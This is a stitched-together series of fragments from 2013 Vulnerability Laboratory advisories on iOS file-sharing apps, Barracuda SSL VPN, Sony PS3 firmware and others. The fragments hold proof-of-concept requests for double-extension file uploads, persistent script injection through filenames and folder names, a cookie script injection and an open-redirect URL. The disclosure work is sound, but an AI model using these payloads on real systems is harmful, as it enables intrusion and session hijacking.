DynamicSig[2].Name=Gebietsschema-ID DynamicSig[2].Value=1031 DynamicSig[22].Name=Zusatzinformation 1 DynamicSig[22].Value=c9ed DynamicSig[23].Name=Zusatzinformation 2 DynamicSig[23].Value=c9ed9ec450d4be6144400a9541f5eddb DynamicSig[24].Name=Zusatzinformation 3 DynamicSig[24].Value=04ae DynamicSig[25].Name=Zusatzinformation 4 DynamicSig[25].Value=04ae339f4a83b6a3d3bf04a428f6874f UI[2]=C:\Program Files (x86)\TagScanner\Tagscan.exe UI[3]=Ultimate TagScanner funktioniert nicht mehr UI[4]=Windows kann online nach einer Lösung für das Problem suchen. UI[5]=Online nach einer Lösung suchen und das Programm schließen UI[6]=Später online nach einer Lösung suchen und das Programm schließen UI[7]=Programm schließen LoadedModule[0]=C:\Program Files (x86)\TagScanner\Tagscan.exe LoadedModule[62]=C:\Program Files (x86)\TagScanner\plugins\bass_aac.dll LoadedModule[63]=C:\Program Files (x86)\TagScanner\plugins\bass_alac.dll LoadedModule[64]=C:\Program Files (x86)\TagScanner\plugins\bass_ape.dll LoadedModule[65]=C:\Program Files (x86)\TagScanner\plugins\bass_mpc.dll LoadedModule[66]=C:\Program Files (x86)\TagScanner\plugins\bass_ofr.dll LoadedModule[67]=C:\Program Files (x86)\TagScanner\OptimFROG.dll LoadedModule[68]=C:\Program Files (x86)\TagScanner\plugins\bass_spx.dll LoadedModule[69]=C:\Program Files (x86)\TagScanner\plugins\bass_tta.dll LoadedModule[70]=C:\Program Files (x86)\TagScanner\plugins\bass_wv.dll LoadedModule[71]=C:\Program Files (x86)\TagScanner\plugins\bassflac.dll LoadedModule[72]=C:\Program Files (x86)\TagScanner\plugins\basswma.dll LoadedModule[73]=C:\Program Files (x86)\TagScanner\plugins\bassopus.dll LoadedModule[74]=C:\Windows\system32\mswsock.dll LoadedModule[75]=C:\Windows\System32\wshtcpip.dll LoadedModule[76]=C:\Windows\system32\DNSAPI.dll LoadedModule[77]=C:\Program Files (x86)\Bonjour\mdnsNSP.dll LoadedModule[78]=C:\Windows\system32\Iphlpapi.DLL LoadedModule[79]=C:\Windows\system32\WINNSI.DLL LoadedModule[80]=C:\Windows\system32\rasadhlp.dll LoadedModule[81]=C:\Windows\System32\wship6.dll LoadedModule[82]=C:\Windows\system32\avrt.dll FriendlyEventName=Nicht mehr funktionsfähig ConsentKey=APPCRASH AppName=Ultimate TagScanner AppPath=C:\Program Files (x86)\TagScanner\Tagscan.exe Solution: = The vulnerability can be patched by a restriction of the input fields when processing to load the rename folder by tag listing. Risk: = The security risk of the local buffer overflow vulnerability is estimated as high(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do
MailOrderWorks v5.907 - Multiple Web Vulnerabilities
: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Wireless Disk PRO v2.3 iOS - Multiple Web Vulnerabilities
) to implement/inject malicious script code on the application side (persistent) of the app web service. The vulnerability is located in the index file dir listing module of the webserver (http://localhost:6566/) when processing to display injected and via POST request method manipulated filenames. The persistent script code will be executed out of the main index file dir listing module when the service is processing to list the new malicious injected filename as item. Exploitation of the persistent web vulnerability requires low or medium user interaction without application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation. Vulnerable Application(s): [+] Wireless Disk PRO v2.3 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload (Web Server) [Remote] Vulnerable Parameter(s): [+] name Affected Module(s): [+] Filename - Index File Dir Listing Proof of Concept: = 1.1 The file include web vulnerability can be exploited by remote attackers without application user account and also without user interaction. For demonstration or reproduce ... PoC: (POST) -243701706111075 Content-Disposition: form-data; name=file; filename=[FILE/PATH INCLUDE WEB VULNERABILITY].png Content-Type: image/gif flag: 137 1.2 The command injection web vulnerability can be exploited by local privilege device user accounts with low required user interaction. For demonstration or reproduce ... DEVICE NAME: IPad360 ¥337 Standard Application Header: div id=header_bottomThe following files are the hosts live from IPad360 ¥337 WirelessDisk App Document folder/div Manipulated Application Header: div id=header_bottomThe following files are the hosts live from [COMMAND INJECTION VIA DEVICENAME!] WirelessDisk App Document folder/div 1.3 The persistent script code injection web vulnerability can be exploited by remote attackers without application user account and with medium required user interaction. For demonstration or reproduce ... Review: Index File Dir Listing - Name table id=table1 border=0 cellpadding=1 cellspacing=2 width=741tbodytrtd style=width:461px;background-color:#ebebeb; ?? a href=327.png target=_blank327.png/a/tdtd style=width:100px;background-color:#e3e3e3;text-align:right; 27.27 KB /tdtd style=width:180px;text-align:center;background-color:#ebebeb;2013-02-11 08:07:16/td/trtr td style=width:461px;background-color:#ebebeb; ?? a href=[PERSISTENT INJECTED SCRIPT CODE AS NAME!] target=_blank[PERSISTENT INJECTED SCRIPT CODE AS NAME!]%20%20%20%20/a/td td style=width:100px;background-color:#e3e3e3;text-align:right;27.27 KB /tdtd style=width:180px;text-align: center;background-color:#ebebeb;2013-02-11 08:07:35/td/tr Risk: = 1.1 The security risk of the local file/path include web vulnerability via POST request method is estimated as critical. 1.2 The security risk of the local command injection vulnerability is estimated as high(-). 1.3 The security risk of the persistent input validation web vulnerability is estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability
File Lite 3.3 3.5 PRO iOS - Multiple Web Vulnerabilities
an application user account but low or medium user interaction. Successful exploitation results in client side cross site requests, unauthorized external redirects, client side phishing, client side session hijacking and client side module context manipulation. Vulnerable Application(s): [+] File Lite 3.3 3.5 PRO - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Files - GET Request Vulnerable Parameter(s): [+] filename Proof of Concept: = 1.1 the arbitrary file upload vulnerability can be exploited by remote attackers without required application user account or user interaction. For demonstration or reproduce ... PoC: POST REQUEST METHOD - FILE UPLOAD Host=192.168.2.104:8080 User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate DNT=1 Referer=http://192.168.2.104:8080/ Connection=keep-alive Content-Type=multipart/form-data; boundary=---48201118910051 Content-Length=98447 POSTDATA =-48201118910051 Content-Disposition: form-data; name=newfile; filename=hacki-hack.png.txt.html.php.gif[FILE UPLOAD VULNERABILITY] Content-Type: image/gif ?PNG ... Review: [{'name':'.Private', 'id':0},{'name':'1234.png.txt.iso.php.gif', 'id':1},{'name':'Recents', 'id':2},{'name':'benjamin.html', 'id':3}] Reference(s): http://localhost:8080/files 1.2 The persistent script code injection web vulnerability can be exploited by remote attackers without application user account and with low user interaction. For demonstration or reproduce ... PoC: File Name - Index Output Listing a href=http://192.168.2.104:8080/files/%3E%22%3Ciframe%20src=a%3E; class=file [PERSISTENT SCRIPT CODE INJECT VULNERABILITY!] src=Welcome%20to%20Evereader%20Wi-Fi%20Sharing%21_files/hack.txt/a /tdtd class='del'form action='/files/%3E%22%3C[PERSISTENT SCRIPT CODE INJECT VULNERABILITY!]%3E' method='post'input name='_method' value='delete' type='hidden'/input name=commit type=submit value=Delete class='button' //td/tr/tbody/table/iframe/a 1.3 The client side script code injection web vulnerability can be exploited by remote attackers without application user account and with low or medium required user interaction. For demonstration or reproduce ... PoC: GET REQUEST METHOD - File Request --- Request Header --- Host=192.168.2.104:8080 User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0 Accept=application/json, text/javascript, */* Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate DNT=1 X-Requested-With=XMLHttpRequest Referer=http://192.168.2.104:8080/ Cookie=USERID=SCRIPTdocument.cookie=true/SCRIPT; true Connection=keep-alive --- Response Header --- Status=OK - 200 Accept-Ranges=bytes Content-Length=171 Cache-Control=private, max-age=0, must-revalidate Content-Type=text/plain; charset=utf-8 Date=Fr., 26 Apr 2013 17:48:48 GMT URL: http://localhost:8080/files?Fri%20Apr%2026%202013%2019:46:51%20GMT+0200 Solution: = 1.1 Parse the POST method request when processing to upload a file with wrong extension and disallow double extensions. Restrict the file access of web files like html, php or java-script. Implement a own exception-handling to prevent again future arbitrary file uploads. 1.2 Restrict the input/output of the del filename and file input parameter. Encode and parse the output of the both vulnerable values to patch the issue. 1.3 Parse the parameter request with the flag details to fix the vulnerability in the GET request. Risk: = 1.1 The security risk of the remote arbitrary file upload vulnerability is estimated as high(-) 1.2 The security risk of the persistent input validation web vulnerability is estimated as medium(+). 1.3 The security risk of the client side cross site scripting vulnerability is estimated as low(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) [www.vulnerability-lab.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor
Sony PS3 Firmware v4.31 - Code Execution Vulnerability
. The ps3 filter system of the SpeicherDaten (DienstProgramm) module does not recognize special chars and does not provide any kind of input restrictions. Attackers can manipulate the .sfo file of a save game to execute system specific commands or inject malicious persistent script code out of the save game preview listing. If you inject standard frames or system unknow commands (jailbreak) without passing the filter char by char and direct sync as update you will fail to reproduce! PoC: PARAM.SFO PSF Ä @ h % , 4 $ C @ ( V h j € p t € ð ACCOUNT_ID ATTRIBUTE CATEGORY DETAIL PARAMS PARAMS2 PARENTAL_LEVEL SAVEDATA_DIRECTORY SAVEDATA_LIST_PARAM SUB_TITLE TITLE 40ac78551a88fdc SD PSHACK: Benjamin Ninja H%20'[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!] Hackizeit: 1:33:07 ExpSkills: VL-LAB-TRAINING Operation: 1% Trojaners: 0% ... Õõ~\˜òíA×éú;óç40ac78551a88fdc ... BLES00371-NARUTO_STORM-0 HACKINGBKM 1 PSHACK: Benjamin Ninja H%20'[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!]; Solution: = Restrict the savegame name input and disallow special chars. Encode the savegame values and redisplaying in the menu preview of the game. Parse the strings and values from the savegames even if included string by string via sync. Risk: = The security risk of the high exploitable but local vulnerability is estimated as critical and needs to be fixed soon. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities
it was the 9th may. On the 18th we downloaded again the main software direct-pass and tested the core without an update and it was still vulnerable. To fix the issue in the software an update from the update-server is required after the install. Risk: = 1.1 The security risk of the local command/path injection software vulnerability in the directpass software core is estimated as high(-). 1.2 The security risk of the persistent scirpt code inject vulnerability is estimated as medium(+). 1.3 The security risk of the pointer (DoS) software vulnerability is estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Barracuda SSL VPN 680 2.2.2.203 - Redirect Web Vulnerability
Title: == Barracuda SSL VPN 680 2.2.2.203 - Redirect Web Vulnerability Date: = 2013-05-25 References: === http://www.vulnerability-lab.com/get_content.php?id=755 Barracuda Networks Security ID (BNSEC): 731 VL-ID: = 755 Common Vulnerability Scoring System: 1.3 Introduction: = The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any Web browser. Designed for remote employees and road warriors, the Barracuda SSL VPN provides comprehensive control over file systems and Web-based applications requiring external access. The Barracuda SSL VPN integrates with third-party authentication mechanisms to control user access levels and provides single sign-on. Barracuda SSL VPN * Enables access to corporate intranets, file systems or other Web-based applications * Tracks resource access through auditing and reporting facilities * Scans uploaded files for viruses and malware * Leverages multi-factor, layered authentication mechanisms, including RSA SecurID and VASCO tokens * Integrates with existing Active Directory and LDAP directories * Utilizes policies for granular access control framework * Supports any Web browser on PC or Mac (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/sslvpn.php) Abstract: = The Vulnerability Laboratory Research Team discovered a redirect vulnerability in the official Barracuda Networks SSL VPN 680 v2.2.2.203. Report-Timeline: 2012-11-11: Researcher Notification Coordination 2012-11-12: Vendor Notification 2012-11-19: Vendor Response/Feedback 2013-02-20: Vendor Fix/Patch 2012-05-27: PublicDisclosure Status: Published Affected Products: == Barracuda Networks Product: SSL VPN 680 2.2.2.203 Exploitation-Technique: === Remote Severity: = Low Details: A remote redirection (external) vulnerability is detected in the Barracuda SSL VPN 680 v2.2.2.203 (Vx) Web Application Appliance. The bug allows remote attackers to prepare links to client side external redirects with malware, phishing websites or malicious web context. The vulnerability is located in the resourceId parameter request when processing to load via GET method an internal `returnTo` file redirect. Vulnerable Module(s): [+] launchApplication.do [resourceId] Vulnerable Parameter(s): [+] returnTo Proof of Concept: = The vulnerability can be exploited by remote attacker without privileged application user account but with medium or high required user inter action. For demonstration or reproduce ... 1.1 The first url shows the standard request via GET request https://sslvpn.127.0.0.1:8080/launchApplication.do?resourceId=1policy=1returnTo=%2FshowApplicationShortcuts.do 1.2 The secound url shows the manipulated remote context via GET request https://sslvpn.127.0.0.1:8080/launchApplication.do?resourceId=1policy=1returnTo=http://www.vulnerability-lab.com https://sslvpn.[SERVER]/[FILE].do?[RES+ID]=x[POLICY]=xreturnTo=[EXTERNAL TARGET] Solution: = The vulnerability can be patched by allowing only local file requests when processing to load the vulnerable returnTo parameter via GET. 2013-02-20: Vendor Fix/Patch Risk: = The security risk of the redirection vulnerability is estimated as low(+). Credits: Vulnerability Laboratory [Research Team] -Chokri Ben Achour (meis...@vulnerability-lab.com) Barracuda Networks [Security Team] - Dave Farrow (Communication Coordination) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com
Bluetooth Chat Connect v1.0 iOS - Multiple Vulnerabilities
user name with a secure filter mask. Escape, filter or encode the message listing to prevent the execution of persistent script codes. 1.2 The denial of service issue can be patched by a secure parse of the collision when processing to handle the same string 2 times as message. Risk: = 1.1 The security risk of the persistent input validation web vulnerability in the client is estimated as medium(+). 1.2 The security risk of the remote denial of service vulnerability in the client is estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) [www.vulnerability-lab.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
eFile Wifi Transfer Manager 1.0 iOS - Multiple Vulnerabilities
; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate DNT=1 X-Requested-With=XMLHttpRequest X-File-Name=1234.png.txt.iso.php.gif Content-Type=application/octet-stream Referer=http://localhost:8080/ Content-Length=98139 POSTDATA =?PNG[X] + double extensions http://localhost:8080/[PATH NAME (x) VALUE].png.txt.iso.php // return false to cancel submit onSubmit: function(id, fileName){}, onProgress: function(id, fileName, loaded, total){}, onComplete: function(id, fileName, responseJSON){}, onCancel: function(id, fileName){}, // messages messages: { typeError: {file} has invalid extension. Only {extensions} are allowed., sizeError: {file} is too large, maximum file size is {sizeLimit}., minSizeError: {file} is too small, minimum file size is {minSizeLimit}., emptyError: {file} is empty, please select files again without it., onLeave: The files are being uploaded, if you leave now the upload will be cancelled.}, ... ... // added to list item when upload completes // used in css to hide progress spinner success: 'qq-upload-success', ... 1.2 The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with low required user interaction. For demonstration or reproduce ... New Folder ... POST http://localhost:8080/# Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[application/x-unknown-content-type] Request Headers: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://localhost:8080/] Connection[keep-alive] Post Data: newFolder[%2520%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]+src%3Da%3E] submitButton[Create] Response Headers: Transfer-Encoding[chunked] Accept-Ranges[bytes] Date[Sun, 23 Jun 2013 10:16:41 GMT] http://localhost:8080/[PATH NAME (x) VALUE] function newFolder() { var title = document.getElementById(formTitle); title.innerText = eFile; title.textContent = eFile; title.setAttribute(id,formTitle); ... ... var message = document.getElementById(formMessage); message.innerText = Enter new folder name; message.textContent = Enter new folder name; message.setAttribute(id,formMessage); ... Reference(s): ../pagescript.js Solution: = 1.1 The arbitrary file upload vulnerability can be patched by a secure parse and restriction in the file upload module and the bound listing access. 1.2 The persistent input validation web vulnerability can be patched by a secure parse of the foldername. Parse the input fields of new folder and also the index output listing to prevent persistent injections or script code executions. Risk: = 1.1 The security risk of the multiple arbitrary file upload vulnerability and restriction bypass is estimated as critical. 1.2 The security risk of the persistent input validation web vulnerability is estimated as high. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission
Mobile USB Drive HD 1.2 - Arbitrary File Upload Vulnerability
/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://192.168.2.104:8080/] 21:01:43.184[125ms][total 177ms] Status: 200[OK] GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[98139] Mime Type[application/x-unknown-content-type] Request Headers: Host[192.168.2.104:8080] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://192.168.2.104:8080/] Connection[keep-alive] Cache-Control[max-age=0] Response Headers: Accept-Ranges[bytes] Content-Length[98139] Date[Do., 27 Jun 2013 19:06:58 GMT] 21:01:43.389[2393ms][total 2393ms] Status: 200[OK] GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif Load Flags[LOAD_NORMAL] Content Size[98139] Mime Type[application/x-unknown-content-type] Request Headers: Host[192.168.2.104:8080] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[98139] Date[Do., 27 Jun 2013 19:07:00 GMT] Risk: = 1.1 The security risk of the arbitrary file upload vulnerability and the multiple extensions issue are estimated as high. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 